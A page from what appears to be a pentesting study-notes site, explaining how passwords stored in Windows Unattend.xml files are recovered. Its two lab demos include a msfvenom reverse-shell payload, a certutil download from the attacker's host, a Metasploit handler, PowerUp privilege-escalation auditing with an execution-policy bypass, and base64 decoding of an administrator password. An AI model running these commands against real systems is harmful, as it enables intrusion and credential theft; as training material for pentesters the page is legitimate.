Dark Arts
  • index
  • BUY ME A BOOK
  • 🪄Dark Magic
    • Pentesting
      • Industry Methodologies
    • Scopes of Testing
    • Reconnaissance
      • Passive
        • WHOIS
        • DNS
          • nslookup
          • dig
        • WAF
        • Subdomain
        • Google Dork
        • Misc. Techniques
        • Leaked Passwords
      • Active
        • Browser & Plugins
        • ping & traceroute
        • fping
        • telnet & netcat
        • DNS
          • Zone Transfer
          • DNS Amplification DDoS Attack Breakdown
        • Misc. Techniques
    • Vulnerability Assessment
    • Attack Types
  • 🕷️Aragoogs Nest
    • Web Application Overview & Security
      • Security Testing
      • Common Threats & Risks
    • Web Application Architecture
      • Technologies
    • HTTP/S
      • Message
      • Request
      • Response
        • Status Code
    • Crawling/Spidering
  • 🧪Potions
    • Web Browsers
    • Computer Networking
      • Network Protocol
      • Packets
      • OSI Layer
        • Layer 3: Network
        • Layer 4: Transport
      • DNS
        • Primary-Secondary
        • Local Name Resolution
        • Domain Hierarchy
        • FQDN
        • Lookups
        • DNS Resolution
        • DNS Records
        • Security: Attack-Defense (Default)
  • 🎆Spells
    • 📜Linux Scroll
    • 📜WebShell Scroll
    • git
      • Attacks + Vulnerabilities
  • 🖼️Flaws w/ Magical Frameworks
    • Windows
      • In a Nutshell
      • CVE-2019-0708: BlueKeep
      • CVE-2017-0144: EternalBlue: MS17-010
      • Attacking Services
        • MS IIS - WebDAV
        • SMB
        • HTTP File Server (HFS)
        • Apache Tomcat Web Server
        • RDP
        • WinRM
      • File System Vulnerabilities
      • Credential Dumping
        • Password Search in Windows Configuration Files
        • Mimikatz
        • Pass-the-Hash Attack
    • Linux
      • In a Nutshell
      • CVE-2014-6271: Shellshock
      • Attacking Services
        • FTP
        • SSH
        • SAMBA
        • SMTP
        • RSYNC
      • Dumping Hashes
  • 🌼Marauder's Boost
    • Privilege Escalation
    • Windows PrivEsc
      • Windows Kernel Exploit
      • Bypassing UAC
      • Access Token Impersonation
    • Linux PrivEsc
      • Linux Kernel Exploit
      • Misconfigured Cron Jobs
      • Exploiting SUID Binaries
      • shells
      • File Permissions
  • ☠️Death Eaters
    • Post Exploitation
      • Windows
      • Linux
  • 🪄OLLIVANDERS
    • nmap
      • Host Discovery
      • Port Scan
      • Service & OS
      • NSE
      • Firewall/IDS Evasion
      • Scan Optimization
      • Misc. Methods
    • ffuf
    • Hydra
    • Metasploit Framework
      • Architecture
      • Must to Know
      • msfvenom
      • Auxiliary Modules
      • Service Enumeration
      • Vulnerability Scanning
      • Imports
      • Automating
    • Vulnerability Scanners
    • Wireshark
  • 🚂Platform 9(3/4)
    • Auth-Auth
      • Authentication
        • Password-based Authentication
        • Basic Authentication
        • Multi-factor Authentication
        • Access Token
        • Token-based Authentication
          • JWT
          • OAuth 2.0
    • Secure Headers
      • Content-Security-Policy (CSP)
    • Cryptography
      • Caesar Cipher
  • ⛲Port Pensieve
    • Enumeration
      • SMB & NetBIOS
      • SNMP
    • Wordlists
  • 🔆DUELS
    • Pivoting
    • SMB Relay Attack
  • 🗺️Marauder's Map
    • Web Application Pentesting
    • API Pentesting
      • GraphQL
        • Primer
    • Mobile Application Pentesting
  • 🎧SIDE CHANNEL
    • Side Channel Analysis
    • Timing Side-Channel Attacks
      • Vulnerable Login
  • 🥃Sky
    • Cloud Basics
    • Cloud Management
      • Shared Responsibility Model
    • Using Cloud Resources
      • Monitoring & Alerts
      • Identity & Access Management
      • Scalability & Availability
      • Solution Design
    • Cloud Providers
    • Cloud Security & Regulatory Compliance
      • Resource Protection
      • ICCA: Cloud Security & Regulatory Compliance
    • ICCA Preparation
      • Knowledge Tests
      • Lab
  • 🔷Obsidian
    • Pentest Engagement
      • Scoping
    • Pentest Ethics
      • Rules of Engagement
    • Auditing Fundamentals
      • Process/Lifecycle
      • Pentest & Security Auditing
      • GRC
      • Standards, Frameworks & Guidelines
      • From Audit to Pentest
  • 📡THREAT INTEL
    • Threat Intelligence
    • Tool Dump
  • 📱Anything-Mobile-IoT
    • Firmware
    • Firmware Analysis
      • Example: CVE-2016-1555
    • Firmware Installation/Flashing
  • 🎉Mischeif
    • Social Engineering
    • Phishing
      • GoPhish
    • Pretexting
Powered by GitBook
On this page
  • Windows Configuration File
  • Unattended Windows Setup Utility
  • Demo #1
  • Demo #2
  1. Flaws w/ Magical Frameworks
  2. Windows
  3. Credential Dumping

Password Search in Windows Configuration Files

Windows Configuration File

Windows uses configuration files to store important settings for system setup and user accounts. These files help automate installations and system configurations without manual input.

Unattended Windows Setup Utility

The Unattended Windows Setup Utility allows Windows to be installed automatically without user interaction. It uses configuration files to apply pre-set settings, including user accounts and system preferences.

The main configuration files used for this are:

As a security measure, any stored passwords in these files may be encoded in Base64 to obscure them, though they can still be decoded if accessed by an attacker.

Demo #1

# Generate a malicious payload using msfvenom that creates a reverse TCP Meterpreter shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[MY IP] LPORT=[MY [PORT] -f exe > payload.exe

# Start a simple HTTP server on port 80 to serve the payload
python -m SimpleHTTPServer 80

# Download the payload
certutil -urlcache -f http://[MY IP]/payload.exe payload.exe

# Use Metasploit's multi/handler to listen for a reverse connection from the payload
msfconsole -q
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LPORT
set LHOST
exploit

# Search for the Unattend.xml file, typically used for automated Windows installation settings
search -f Unattend.xml
download Unattend.xml
cat Unattend.xml

# Save extracted password to a text file
echo "Copied Password" > passfile.txt

# Decode the base64-encoded password stored in passfile.txt
base64 -d passfile.txt

Demo #2

# Open powershell.exe terminal to check the current user.
whoami

# We will run the powerup.ps1 Powershell script to find privilege escalation vulnerability.
cd Powersploit\Privesc

# Bypass the execution policy to allow the script to run
powershell -ep bypass
# Import the PowerUp.ps1 script, which contains various PowerShell-based privilege escalation techniques
. .\PowerUp.ps1
# Run the Invoke-PrivescAudit function from PowerUp.ps1 to perform a privilege escalation audit
Invoke-PrivescAudit
cat C:\Windows\Panther\Unattend.xml

# Decoding administrator password using Powershell.
$password='QWRtaW5AMTIz'
$password=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($pa
ssword))
echo $password
PreviousCredential DumpingNextMimikatz

Last updated 14 days ago

🖼️